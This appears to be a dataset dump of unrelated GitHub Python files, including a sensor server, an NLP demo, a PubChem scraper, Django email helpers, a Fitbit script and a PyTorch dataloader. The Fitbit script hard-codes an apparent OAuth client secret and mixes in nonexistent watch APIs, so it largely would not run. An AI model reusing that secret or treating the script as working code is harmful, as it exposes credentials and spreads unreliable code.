args=(paras,))\n\t\t\tp_server.start()\n\n\t\tret = task_serial(paras)\n\n\t\tif config['server_mode']['service']:\n\t\t\tp_server.join()\n\t\n\tdel data_out\n\tdel data_raw\n\tdel data_imu\n\tdel idx_out\n\tdel pipe_proc, pipe_server\n\n\treturn ret\n\n\ndef main():\n\tparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument('-e', dest='enumerate', action=make_action('store_true'), default=False, help=\"enumerate all serial ports\")\n\tparser.add_argument('-p', dest='port', action=make_action('store'), default=PORT, help=\"specify serial port\")\n\tparser.add_argument('-b', dest='baudrate', action=make_action('store'), default=BAUDRATE, type=int, help=\"specify baudrate\")\n\tparser.add_argument('-t', dest='timeout', action=make_action('store'), default=TIMEOUT, type=float, help=\"specify timeout in seconds\")\n\tparser.add_argument('-n', dest='n', action=make_action('store'), default=[N], type=int, nargs='+', help=\"specify sensor shape\")\n\tparser.add_argument('--noservice', dest='noservice', action=make_action('store_true'), default=False, help=\"do not run service (only serial data receiving & processing)\")\n\tparser.add_argument('-a', '--address', dest='address', action=make_action('store'), help=\"specify server socket address\")\n\tparser.add_argument('-u', '--udp', dest='udp', action=make_action('store_true'), default=UDP, help=\"use UDP protocol\")\n\tparser.add_argument('-r', '--raw', dest='raw', action=make_action('store_true'), default=False, help=\"raw data mode\")\n\tparser.add_argument('-nc', '--no_convert', dest='no_convert', action=make_action('store_true'), default=NO_CONVERT, help=\"do not apply voltage-resistance conversion\")\n\tparser.add_argument('-v', '--visualize', dest='visualize', action=make_action('store_true'), default=False, help=\"enable visualization\")\n\tparser.add_argument('-z', '--zlim', dest='zlim', action=make_action('store'), default=ZLIM, type=float, help=\"z-axis limit\")\n\tparser.add_argument('-f', dest='fps', action=make_action('store'), default=FPS, type=int, help=\"frames per second\")\n\tparser.add_argument('--scatter', dest='scatter', action=make_action('store_true'), default=False, help=\"show scatter plot\")\n\tparser.add_argument('--pyqtgraph', dest='pyqtgraph', action=make_action('store_true'), default=False, help=\"use pyqtgraph to plot\")\n\t# parser.add_argument('-m', '--matplot', dest='matplot', action=make_action('store_true'), default=False, help=\"use matplotlib to plot\")\n\tparser.add_argument('--config', dest='config', action=make_action('store'), default=None, help=\"specify configuration file\")\n\tparser.add_argument('-d', '--debug', dest='debug', action=make_action('store_true'), default=DEBUG, help=\"debug mode\")\n\n\tparser.add_argument('filenames', nargs='*', action='store', help=\"use file(s) as data source instead of serial port\")\n\tparser.add_argument('-o', dest='output', action=make_action('store'), default=OUTPUT_FILENAME, help=\"output processed data to file\")\n\n\tparser.add_argument('-i', '--imu', dest='imu', action=make_action('store_true'), default=False, help=\"support IMU\")\n\n\tparser.add_argument('--intermediate', dest='intermediate', action=make_action('store'), default=INTERMEDIATE, type=int, help=\"specify intermediate result\")\n\n\targs = parser.parse_args()\n\tconfig = prepare_config(args)\n\n\twhile True:\n\t\t## run according to config\n\t\tret = run(config)\n\n\t\tif ret != None:\n\t\t\tif ret[0] == 1: ## restart\n\t\t\t\tconfig = ret[1]\n\t\t\t\tcontinue\n\n\t\t## exit program\n\t\tbreak\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"atomiechen/MatSense","sub_path":"matsense/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":12987,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"32571354466","text":"import os\nimport pyltp\n\n# 模型的路径\nLTP_DATA_DIR = r'D:\\work\\data_collectors\\ltp_data'\n# 分词模型\ncws_model_path = os.path.join(LTP_DATA_DIR, 'cws.model')\n# 词性标注模型\npos_model_path = os.path.join(LTP_DATA_DIR, 'pos.model')\n# 实体识别模型\nner_model_path = os.path.join(LTP_DATA_DIR, 'ner.model')\n# 依存句法分析模型#\npar_model_path = os.path.join(LTP_DATA_DIR, 'parser.model')\n\ndef test_first():\n LTP_DATA_DIR = r'D:\\work\\data_collectors\\ltp_data'\n pos_model_path = os.path.join(LTP_DATA_DIR, 'pos.model') # 词性标注模型路径,模型名称为`pos.model`\n\n from pyltp import Postagger\n postagger = Postagger() # 初始化实例\n postagger.load(pos_model_path) # 加载模型\n\n words = ['欧几里得', '是', '西元前', '三', '世纪', '的', '希腊', '数学家', '。']\n postags = postagger.postag(words) # 词性标注\n\n print(' '.join(postags))\n postagger.release() # 释放模型\n\n\n# 基于LTP的分词\ndef word_segmentation(sentence):\n cws_ = pyltp.Segmentor()\n cws_.load(cws_model_path)\n words = cws_.segment(sentence)\n print('\\t'.join(words))\n cws_.release()\n return words\n\n\n# 基于LTP的词性标注\ndef word_posttagger(sentence):\n pos_ = pyltp.Postagger()\n pos_.load(pos_model_path)\n result = pos_.postag(sentence)\n print(type(result))\n print('\\t'.join(result))\n pos_.release()\n return result\n\n\n# 基于LTP的实体识别\ndef word_ner(words, pos_tags):\n ner_ = pyltp.NamedEntityRecognizer()\n ner_.load(ner_model_path)\n name_entity = ner_.recognize(words, pos_tags)\n print('\\t'.join(name_entity))\n ner_.release()\n return name_entity\n\n\n# 基于LTP的依存句法分析#\ndef word_par(words, pos_tags):\n par_ = pyltp.Parser()\n par_.load(par_model_path)\n arcs = par_.parse(words, pos_tags)\n print('\\t'.join('%d:%s' % (arc.head, arc.relation) for arc in arcs))\n par_.release()\n return arcs\n\n\nif __name__ == '__main__':\n word_parse = word_segmentation('国务院总理李克强调研上海外高桥时提出,支持上海积极探索新机制。')\n word_property_list = word_posttagger(word_parse)\n for item in zip(word_parse, word_property_list):\n print(item)\n word_ner(word_parse, word_property_list)\n word_par(word_parse, word_property_list)\n\n\n\n\n","repo_name":"ReigenDing/free_coding","sub_path":"自然语言处理/ltp.py","file_name":"ltp.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73355300561","text":"from refs import END_OPT_C, OPT_C\nfrom text.screens.screen_names import BACK, INTRO_DOMAIN_GENDER\n\n\ndef get_screen(console, screen_data):\n display_text = f'\\n\\tOh almighty Deity, please bless us with your name.\\n'\n display_text += f'\\n\\t{OPT_C}0:{END_OPT_C} Cancel\\n'\n _options = {'0': BACK}\n return display_text, _options\n\n\ndef handle_action(console, action):\n console.new_game_info['name'] = action\n console.set_screen(INTRO_DOMAIN_GENDER, True)\n","repo_name":"eman1can/CoatiraneAdventures","sub_path":"src/text/screens/new_game/intro_domain_name.py","file_name":"intro_domain_name.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"15187399103","text":"import time\nfrom tqdm import tqdm \nimport itertools as itr\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport traceback\nfrom selenium.webdriver.chrome.options import Options\nimport pandas as pd \nimport re\nimport glob \nimport shutil \nimport os\n\ndef scrape() : \n #任意のディレクトリを指定\n download_directory = '/Users/soheikurita/Documents/venv/gene2/'\n download_url = 'https://pubchem.ncbi.nlm.nih.gov/gene/'\n gene_csv = pd.read_csv(\"Pubchem_gene_text_covid-19.csv\")\n for i in range(len(gene_csv[\"geneid\"])):\n current_download_directory = download_directory + str(gene_csv[\"geneid\"][i])\n current_download_url = download_url + str(gene_csv[\"geneid\"][i])\n options = webdriver.ChromeOptions()\n #デフォルトダウンロードフォルダを変更する\n options.add_experimental_option(\"prefs\", {\"download.default_directory\": current_download_directory})\n #自動テストソフトウェアによって制御されていますというメッセージを非表示にする\n options.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\n # 拡張機能の自動更新をさせない(アプリ側の自動アップデートとドライバーの互換性によるエラーを回避)\n options.add_experimental_option('useAutomationExtension', False)\n driver = webdriver.Chrome(\"/Users/soheikurita/Documents/venv/chromedriver\", chrome_options=options)\n try:\n driver.implicitly_wait(10)\n driver.get(current_download_url)\n driver.find_element_by_tag_name('body').click()\n for i in range(1000):\n driver.find_element_by_tag_name('body').send_keys(Keys.PAGE_DOWN)\n time.sleep(10)\n #JAVA SCRIPTの実行\n #ダウンロードボタンを押すために邪魔となっているsticky-barをremoveする\n driver.execute_script(\"document.getElementsByClassName('sticky-bar')[0].remove();\")\n elements = driver.find_elements_by_xpath(\"//button[@data-action='download-section-menu-open']/span\")\n for e in elements:\n e.click()\n save_button = driver.find_elements_by_xpath(\"//span[text()='Save']\")\n save_button[0].click()\n time.sleep(3)\n except:\n traceback.print_exc()\n finally:\n driver.quit()\n\n\ndef mkdir():\n #任意の親ディレクトリに各ファイル用のディレクトリを作成 \n #pdbディレクトリの作成\n l = glob.glob(\"gene2/**/*_pdb*.csv\", recursive = True)\n for i in range(len(l)):\n new_path = shutil.move(l[i], \"pdb\")\n #tested compounds (bioactivity gene)ディレクトリの作成\n l_bio_gene = glob.glob(\"gene2/**/*_bioactivity_gene*.csv\", recursive = True)\n for i in range(len(l_bio_gene)):\n new_path_bio_gene = shutil.move(l_bio_gene[i], \"bioactivity_gene\")\n #drugbank drugsディレクトリの作成\n l_drugbank = glob.glob(\"gene2/**/*_drugbank*.csv\", recursive = True)\n for i in range(len(l_drugbank)):\n new_path_drugbank = shutil.move(l_drugbank[i], \"drugbank\")\n #chembl drugディレクトリの作成\n l_chembl = glob.glob(\"gene2/**/*_chembldrugtargets*.csv\", recursive = True)\n for i in range(len(l_chembl)):\n new_path_chembl = shutil.move(l_chembl[i], \"chembldrug\")\n #guide to pharmacology ligands ディレクトリ\n l_gtopdb = glob.glob(\"gene2/**/*_gtopdb*.csv\", recursive = True)\n for i in range(len(l_gtopdb)):\n new_path_gtopdb = shutil.move(l_gtopdb[i], \"gtopdb\")\n #bioassay ディレクトリ\n l_bioassay = glob.glob(\"gene2/**/*_bioassay*.csv\", recursive = True)\n for i in range(len(l_bioassay)):\n new_path_bioassay = shutil.move(l_bioassay[i], \"bioassay\")\n #ctd gene-disease ディレクトリ\n l_gene_disease = glob.glob(\"gene2/**/*_ctd_gene_disease*.csv\", recursive = True)\n for i in range(len(l_gene_disease)):\n new_path_gene_disease = shutil.move(l_gene_disease[i], \"gene_disease\")\n #gene-gene interaction ディレクトリ\n l_geneinter = glob.glob(\"gene2/**/*_geneinteractions*.csv\", recursive = True)\n for i in range(len(l_geneinter)):\n new_path_geneinter = shutil.move(l_geneinter[i], \"geneinter\")\n #drug-gene interaction ディレクトリ\n l_dgidb = glob.glob(\"gene2/**/*_dgidb*.csv\", recursive = True)\n for i in range(len(l_dgidb)):\n new_path_dgidb = shutil.move(l_dgidb[i], \"dgidb\")\n #ctd chemical-gene interactions ディレクトリ\n l_ctdchemicalgene = glob.glob(\"gene2/**/*_ctdchemicalgene*.csv\", recursive = True)\n for i in range(len(l_ctdchemicalgene)):\n new_path_ctdchemicalgene = shutil.move(l_ctdchemicalgene[i], \"ctdchemicalgene\")\n #pathwayreaction ディレクトリ\n l_pathwayreaction = glob.glob(\"gene2/**/*_pathwayreaction*.csv\", recursive = True)\n for i in range(len(l_pathwayreaction)):\n new_path_pathwayreaction = shutil.move(l_pathwayreaction[i], \"pathwayreaction\")\n #pathwayディレクトリ\n l_pathway = glob.glob(\"gene2/**/*_pathway*.csv\", recursive = True)\n for i in range(len(l_pathway)):\n new_path_pathway = shutil.move(l_pathway[i], \"pathwaygene\")\n #RHEAディレクトリ\n l_rhea = glob.glob(\"gene2/**/*_rhea*.csv\", recursive = True)\n for i in range(len(l_rhea)):\n new_path_rhea = shutil.move(l_rhea[i], \"rhea\")\n \n\n\ndef make_csv_for_togo():\n\n #csv内の文字列を分割する必要のあるcolumnsのdict\n columns_dict = {\n 'bioactivity_gene': [],\n \"bioassay\": [\"pmids\"],\n \"chembldrug\":[\"pmids\", \"dois\"],\n \"ctdchemicalgene\":[\"pmids\"],\n \"dgidb\":[\"pmids\", \"dois\"],\n \"drugbank\":[\"pmids\", \"dois\"],\n \"gene_disease\":[\"pmids\", \"dois\"],\n \"gtopdb\":[\"pmids\", \"dois\"],\n \"pathwaygene\":[\"pmids\"],\n \"pathwayreaction\":[\"pmids\"],\n \"pdb\":[\"pmids\", \"dois\"]\n }\n #RDF作成上必要のないcolumnsのdict\n droplist = [[\"aidtype\", \"aidmdate\", \"hasdrc\", \"rnai\", \"acname\", \"acvalue\", \"aidsrcname\", \"cmpdname\", \"ecs\", \"repacxn\"], \\\n [\"aiddesc\", \"aidsrcid\", \"aidsrcname\", \"aidmdate\", \"cids\", \"sids\", \"geneids\", \"aidcategories\", \"protacxns\", \"depcatg\", \"rnai\", \"ecs\", \"repacxns\", \"annotation\"], \\\n [\"srcid\", \"moa\", \"action\"] , \\\n [\"genesymbol\", \"taxname\", \"interaction\"] , \\\n [\"srcid\", \"geneclaimname\", \"interactionclaimsource\", \"interactiontypes\", \"drugclaimname\", \"drugclaimprimaryname\"], \\\n [\"srcid\", \"genesymbol\", \"drugtype\", \"druggroup\", \"drugaction\", \"targettype\", \"targetid\", \"targetcomponent\", \"targetcomponentname\", \"generalfunc\", \"specificfunc\"], \\\n [\"srcid\", \"genesymbol\", \"diseasesrcdb\", \"directevidence\"] , \\\n [\"srcid\", \"ligand\", \"primarytarget\", \"type\", \"action\", \"units\", \"affinity\", \"targetname\", \"targetspecies\", \"genesymbol\"], \\\n [\"pwtype\", \"category\", \"srcid\", \"extid\", \"core\", \"cids\", \"geneids\", \"protacxns\", \"ecs\", \"annotation\"], \\\n [\"cids\", \"geneids\", \"protacxns\", \"ecs\"], \\\n [\"resolution\", \"srcid\", \"expmethod\", \"lignme\", \"cids\", \"protacxns\", \"geneids\"] ]\n\n\n i = 0\n for directory, columns in columns_dict.items():\n #csvファイルは任意のディレクトリに保存\n file_list = glob.glob(f'{directory}/*.csv')\n print(f'Number of files: {len(file_list)}')\n\n for file_name in file_list:\n\n df = pd.read_csv(file_name)\n df = df.drop(droplist[i], axis = 1)\n new_df = pd.DataFrame(columns = df.columns)\n fi = os.path.splitext(os.path.basename(file_name))[0]\n\n for index in tqdm(df.index, desc=file_name):\n data = df.iloc[index].to_dict()\n #一つのセルに|,で区切られた複数のidを分割し、それぞれ新しい行にする\n for data_set in itr.product(*[filter(lambda a: a != '', re.split('[|,]', str(data[column]))) for column in columns]):\n for column, value in zip(columns, data_set):\n data[column] = value\n new_df = new_df.append(data, ignore_index=True)\n \n new_df.to_csv(f'{directory}_s.csv', index=False, mode='a', header=file_name==file_list[0])\n i += 1\n\nif __name__ == \"__main__\": \n scrape()\n mkdir()\n make_csv_for_togo()\n\n\n\n\n\n","repo_name":"Soooheee/glycovid_PubChem","sub_path":"rdf.py","file_name":"rdf.py","file_ext":"py","file_size_in_byte":8591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"21490257317","text":"import os\nimport ds_utils\nimport pandas as pd\nimport numpy as np\nimport datetime\n\nfrom models.mediaalpha.time_of_day.data.queries import hc_session_conversions\nfrom models.utils.time_of_day import get_lowess_spline\n\nfrom api.mediaalpha.mediaalpha_client import MediaAlphaAPIClient\n\ndef main():\n TRAFFIC_SOURCE = 'MEDIAALPHA'\n PRODUCT = 'HEALTH'\n NOW = datetime.datetime.now()\n DAY = datetime.timedelta(days=1)\n\n start_date = NOW - 90 * DAY\n end_date = NOW - 0 * DAY\n\n # Get data according to date range\n session_revenue = hc_session_conversions(start_date, end_date, PRODUCT, TRAFFIC_SOURCE)\n \n # Get modifiers\n rev_spline, avg_rev = get_lowess_spline(session_revenue, 'user_ts', 'revenue', show_plots=False)\n modifiers = (rev_spline / avg_rev).tolist()\n\n # Terrible way of making Sunday be last\n modifiers = modifiers[96:] + modifiers[:96]\n\n schedule_payload = []\n temp_day = []\n temp_hour = []\n for day in range(7):\n for hour in range(24):\n temp_day.append(modifiers[(day * 96 + hour * 4):(day * 96 + hour * 4 + 4)])\n schedule_payload.append(temp_day)\n temp_day = []\n\n token = os.getenv(\"MEDIAALPHA_TOKEN\")\n client = MediaAlphaAPIClient(base_url = \"https://insurance-api.mediaalpha.com/220\", token=token)\n client.set_time_of_day_modifiers(schedule_payload, campaign=23898)\n\nif __name__ == '__main__':\n main()\n","repo_name":"pkrishnamurthy1007/adtech","sub_path":"models/mediaalpha/time_of_day/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37555825103","text":"from django.contrib.auth.tokens import PasswordResetTokenGenerator\nfrom django.contrib.auth.models import Group\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.utils.encoding import force_bytes\nfrom django.utils.http import urlsafe_base64_encode\nfrom django.template.loader import render_to_string\nfrom django.core.mail import send_mail\nfrom django.contrib import messages\n\n\n# Account confirmation token gen\nclass AccountActivationTokenGenerator(PasswordResetTokenGenerator):\n def _make_hash_value(self, user, timestamp):\n return f\"{user.pk}{timestamp}{user.email_confirmed}\"\n\n\naccount_activation_token = AccountActivationTokenGenerator()\n\n\n# Emails\ndef send_account_confirmation_email(request, user):\n current_site = get_current_site(request)\n subject = \"Transglobal: New account created!\"\n html_message = render_to_string(\n \"emails/confirmation_email.html\",\n {\n \"user\": user,\n \"domain\": current_site.domain,\n \"uid\": urlsafe_base64_encode(force_bytes(user.pk)),\n \"token\": account_activation_token.make_token(user),\n },\n )\n try:\n send_mail(\n subject=subject,\n message=html_message,\n from_email=None,\n recipient_list=[user.email],\n fail_silently=False,\n html_message=html_message,\n )\n user.confirmation_email_sent = True\n user.save()\n messages.success(\n request,\n (\"An email has been sent to the user to complete registration.\"),\n )\n except Exception as e:\n messages.warning(\n request,\n (\"There was an error while delivering the confirmation email to the user.\"),\n )\n\n\n# User groups\ndef auto_assign_groups(\n user, staff_group_name: str = \"Staff\", customer_group_name: str = \"Customer\"\n):\n groups = user.groups.all()\n belongs_to_staff = groups.filter(name=staff_group_name).exists()\n # belongs_to_customer = groups.filter(name=customer_group_name).exists()\n staff_group = Group.objects.get(name=staff_group_name)\n # customer_group = Group.objects.get(name=customer_group_name)\n\n if user.is_staff:\n if not belongs_to_staff:\n user.groups.add(staff_group)\n\n # if belongs_to_customer: # Delete wrong group.\n # self.groups.remove(customer_group)\n elif not user.is_staff: # Delete wrong group.\n if belongs_to_staff:\n user.groups.remove(staff_group)\n\n # if not belongs_to_customer: # It's a new customer.\n # self.groups.add(customer_group)\n user.save()\n","repo_name":"sxjugalde/transglobal_vehicule_portal","sub_path":"users/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39945438183","text":"\nimport gather_keys_oauth2 as Oauth2\nimport fitbit\nimport pandas as pd \nimport datetime\n\nCLIENT_ID='2398RL'\nCLIENT_SECRET='00148b3850f9852fe64e5eff7b41d161'\n\nserver=Oauth2.OAuth2Server(CLIENT_ID, CLIENT_SECRET)\nserver.browser_authorize()\nACCESS_TOKEN=str(server.fitbit.client.session.token['access_token'])\nREFRESH_TOKEN=str(server.fitbit.client.session.token['refresh_token'])\nauth2_client=fitbit.Fitbit(CLIENT_ID,CLIENT_SECRET,oauth2=True,access_token=ACCESS_TOKEN,refresh_token=REFRESH_TOKEN)\n\nfrom fitbit import api \nimport appbit \nimport heartrate\nif appbit.permissions.granted(\"access_heart_rate\"): \n hrm = heartrate.HeartRateSensor() \n hrm.start()\n\nfrom accelerometer import Accelerometer\nfrom barometer import Barometer\nfrom heart_rate import HeartRateSensor\nfrom gyroscope import Gyroscope\nfrom orientation import OrientationSensor\n\nprint(\"App Started\")\n\naccel = Accelerometer()\nbar = Barometer()\nhrm = HeartRateSensor()\ngyro = Gyroscope()\norientation = OrientationSensor(frequency=60)\n\naccel.start()\nbar.start()\nhrm.start()\ngyro.start()\norientation.start()\n\ndef refresh_data():\n print(\"accel:\", accel.timestamp,\n \"bar:\", bar.pressure,\n \"hrm:\", hrm.heart_rate,\n \"gyro:\", gyro.timestamp,\n \"orientation\", orientation.timestamp\n )\n\nrefresh_data()\nimport time\nwhile True:\n refresh_data()\n time.sleep(2)\n\n\n\n\n\n\n\n\n\nprint(auth2_client._COLLECTION_RESOURCE('heart', date= datetime.datetime.now()))\ntry:\n import heartrate\n hrm = heartrate.HeartRateSensor(frequency=1)\n def on_reading():\n print(f\"Current heart rate: {hrm.heartRate}\")\n hrm.add_event_listener(\"reading\", on_reading)\n hrm.start()\nexcept ImportError:\n print(\"The heart-rate module is not available.\")\n\n# This is the date of data that I want. \n# You will need to modify for the date you want\noneDate = pd.datetime(year = 2023, month = 1, day = 25)\noneDayData = auth2_client.intraday_time_series('activities/heart', oneDate, detail_level='1sec')\n\n# The first part gets a date in a string format of YYYY-MM-DD\nstarttime = pd.datetime(year = 2023, month = 1, day = 24)\nendtime= pd.datetime.today().date() \nimport time\ndate_list = []\ndf_list= []\nallDates = pd.date_range(start=starttime, end=endtime)\n\nfor oneDate in allDates:\n oneDate = oneDate.date().strftime(\"%Y-%m-%d\")\n oneDayDta = auth2_client.intraday_time_series('activities/heart', base_date = '',detail_level='1sec')\n df = pd.DataFrame(oneDayDta['activities-heart-intraday']['dataset'])\n date_list.append(oneDate)\n df_list.append(df)\n\nfinal_df_list=[]\nprint(df_list)\n\n\n##print(df.iloc[-1:])\n\n#time.sleep(5)\n \n # date_list.append(oneDate)\n # df_list.append(df)\n \n#final_df_list = []\n\n#for date, df in zip(date_list, df_list):\n# if len(df)==0:\n# continue\n# df.loc[:, 'date'] = pd.to_datetime(date)\n# final_df_list.append(df)\n#final_df = pd.concat(final_df_list, axis=0)\n\n#print(final_df.tail())","repo_name":"sd1419/GroupProject","sub_path":"SetUp.py","file_name":"SetUp.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41869035572","text":"import torch.utils.data as data\nfrom PIL import Image\nimport os\nimport os.path\nfrom glob import glob\nimport random\nimport numpy as np\nimport torch\nimport torchvision.transforms as transforms\nimport torchvision.transforms.functional as TF\n\ndef _make_dataset(input_dir,target_dir):\n \"\"\"\n Creates a 2D list of all the frames in N clips containing\n M frames each.\n\n 2D List Structure:\n [[frame00, frame01,...frameM] <-- clip0\n [frame00, frame01,...frameM] <-- clip0\n :\n [frame00, frame01,...frameM]] <-- clipN\n\n Parameters\n ----------\n dir : string\n root directory containing clips.\n\n Returns\n -------\n list\n 2D list described above.\n \"\"\"\n\n\n # framesPath = []\n # # Find and loop over all the clips in root `dir`.\n # count = 0\n # for index, folder in enumerate(os.listdir(input_dir)):\n # BlurryFolderPath = os.path.join(input_dir, folder)\n # SharpFolderPath = os.path.join(target_dir, folder)\n\n # # Skip items which are not folders.\n # if not (os.path.isdir(BlurryFolderPath)):\n # continue\n # BlurryFramePath = sorted(os.listdir(BlurryFolderPath))\n # for frame_index in range(len(BlurryFramePath)):\n # framesPath.append({})\n # framesPath[count]['LQ'] = os.path.join(BlurryFolderPath,BlurryFramePath[frame_index])\n # num_frame_B = int(BlurryFramePath[frame_index].split('.')[0])\n\n # framesPath[count]['HQ'] = os.path.join(SharpFolderPath,\"%06d.png\"%(num_frame_B))\n # count += 1\n # return framesPath\n \n \n framesPath = []\n # Find and loop over all the clips in root `dir`.\n count = 0\n input_img_paths = sorted(glob(os.path.join(input_dir,'*'), recursive=True))\n target_img_paths = sorted(glob(os.path.join(target_dir,'*'), recursive=True))\n assert len(input_img_paths) == len(target_img_paths)\n for index in range(len(input_img_paths)):\n \n framesPath.append({})\n framesPath[count]['input'] = input_img_paths[index]\n framesPath[count]['target'] = target_img_paths[index]\n count += 1\n return framesPath\n\n\ndef _pil_loader(path, cropArea=None, resizeDim=None, frameFlip=0):\n \"\"\"\n Opens image at `path` using pil and applies data augmentation.\n\n Parameters\n ----------\n path : string\n path of the image.\n cropArea : tuple, configional\n coordinates for cropping image. Default: None\n resizeDim : tuple, configional\n dimensions for resizing image. Default: None\n frameFlip : int, configional\n Non zero to flip image horizontally. Default: 0\n\n Returns\n -------\n list\n 2D list described above.\n \"\"\"\n\n\n # open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)\n with open(path, 'rb') as f:\n img = Image.open(f)\n # Resize image if specified.\n resized_img = img.resize(resizeDim, Image.ANTIALIAS) if (resizeDim != None) else img\n # Crop image if crop area specified.\n cropped_img = resized_img.crop(cropArea) if (cropArea != None) else resized_img\n # Flip image horizontally if specified.\n flipped_img = cropped_img.transpose(Image.FLIP_LEFT_RIGHT) if frameFlip else cropped_img\n return flipped_img.convert('RGB')\n \n \nclass RestoreDataset(data.Dataset):\n \"\"\"\n\n Attributes\n ----------\n framesPath : list\n List of frames' path in the dataset.\n\n Methods\n -------\n __getitem__(index)\n Returns the sample corresponding to `index` from dataset.\n __len__()\n Returns the size of dataset. Invoked as len(datasetObj).\n __repr__()\n Returns printable representation of the dataset object.\n \"\"\"\n\n\n def __init__(self, dataroot, degrade_type=None, patch_size=16, phase='train', data_len=-1):\n self.dataroot = dataroot\n self.degrade_type = degrade_type\n self.patch_size = patch_size\n self.data_len = data_len\n self.phase = phase\n input_dir = os.path.join(dataroot,'input')\n target_dir = os.path.join(dataroot,'target')\n framesPath = _make_dataset(input_dir,target_dir)\n # Raise error if no images found in root.\n self.dataset_len = len(framesPath)\n if self.dataset_len == 0:\n raise(RuntimeError(\"Found 0 files in subfolders of: %s\"%(dataroot)))\n \n if self.data_len <= 0:\n self.data_len = self.dataset_len\n else:\n self.data_len = min(self.data_len, self.dataset_len)\n \n self.framesPath = framesPath\n\n if degrade_type:\n if degrade_type == 'blur':\n self.degrade_index = 0\n # elif degrade_type == 'rain':\n # self.degrade_index = 1\n elif degrade_type == 'noise':\n self.degrade_index = 1 \n elif degrade_type == 'lowlight':\n self.degrade_index = 2\n else:\n raise TypeError('degrade type {:s} not found'.format(degrade_type)) \n # mean = [0.5,0.5,0.5]\n # std = [1,1,1]\n # normalize = transforms.Normalize(mean=mean,\n # std = std)\n if phase == 'train':\n # random_crop = transforms.RandomCrop(config['crop_size_X'],config['crop_size_Y'])\n self.transform = transforms.Compose([transforms.ToTensor() ])\n else:\n self.transform = transforms.Compose([transforms.ToTensor()])\n\n def __getitem__(self, index):\n \"\"\"\n Returns the sample corresponding to `index` from dataset.\n\n The sample consists of two reference frames - B1 and B2 -\n and coresponding start and end frame groundtruth B1_S B1_E ... \n\n Parameters\n ----------\n index : int\n Index\n\n Returns\n -------\n tuple\n (sample, returnIndex) where sample is \n [I0, intermediate_frame, I1] and returnIndex is \n the position of `random_intermediate_frame`. \n e.g.- `returnIndex` of frame next to I0 would be 0 and\n frame before I1 would be 6.\n \"\"\"\n\n\n sample = {}\n inp_path = self.framesPath[index]['input']\n tar_path = self.framesPath[index]['target']\n inp_img = Image.open(inp_path)\n tar_img = Image.open(tar_path)\n if self.phase == 'train':\n ps = self.patch_size\n ### Data Augmentation ###\n \n w,h = tar_img.size\n padw = ps-w if w 0:\n ps = self.patch_size\n inp_img = TF.center_crop(inp_img, (ps,ps))\n tar_img = TF.center_crop(tar_img, (ps,ps))\n\n inp_img = TF.to_tensor(inp_img)\n tar_img = TF.to_tensor(tar_img)\n \n sample['input'] = inp_img\n sample['target'] = tar_img\n sample['B_path'] = self.framesPath[index]['input']\n sample['index'] = self.degrade_index\n return sample \n\n\n def __len__(self):\n \"\"\"\n Returns the size of dataset. Invoked as len(datasetObj).\n\n Returns\n -------\n int\n number of samples.\n \"\"\"\n\n\n return self.data_len\n\n def __repr__(self):\n \"\"\"\n Returns printable representation of the dataset object.\n\n Returns\n -------\n string\n info.\n \"\"\"\n\n\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Root Location: {}\\n'.format(self.dataroot)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp, self.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n return fmt_str\n \n","repo_name":"yjzhang96/Multitask-Restoration","sub_path":"data/dataloader_pair.py","file_name":"dataloader_pair.py","file_ext":"py","file_size_in_byte":10234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19247897447","text":"__author__ = 'jonathan'\n\nimport test.nova._fixtures as models\nfrom lib.rome.core.orm.query import Query\n\nfrom lib.rome.core.orm.query import Query as RomeQuery\nfrom lib.rome.core.session.session import Session as RomeSession\nimport six\n# from oslo.utils import timeutils\nfrom lib.rome.core.utils import timeutils\nfrom test.nova.methods.test_ensure_default_secgroup import _security_group_ensure_default, _security_group_get_query\nfrom sqlalchemy.sql.expression import asc\n\nimport logging\nimport uuid\nfrom lib.rome.core.orm.query import or_\nfrom lib.rome.core.orm.query import and_\nfrom sqlalchemy.sql import null\n\nLOG = logging.getLogger()\n\n# List of fields that can be joined in DB layer.\n_INSTANCE_OPTIONAL_JOINED_FIELDS = ['metadata', 'system_metadata',\n 'info_cache', 'security_groups',\n 'pci_devices']\n# These are fields that are optional but don't translate to db columns\n_INSTANCE_OPTIONAL_NON_COLUMN_FIELDS = ['fault', 'numa_topology',\n 'pci_requests']\n\n# These are fields that can be specified as expected_attrs\nINSTANCE_OPTIONAL_ATTRS = (_INSTANCE_OPTIONAL_JOINED_FIELDS +\n _INSTANCE_OPTIONAL_NON_COLUMN_FIELDS)\n\ndef get_session(use_slave=False, **kwargs):\n # return FakeSession()\n return RomeSession()\n # return OldRomeSession()\n\n\ndef model_query(context, *args, **kwargs):\n # base_model = kwargs[\"base_model\"]\n # models = args\n return RomeQuery(*args, **kwargs)\n\ndef _dict_with_extra_specs(inst_type_query):\n \"\"\"Takes an instance or 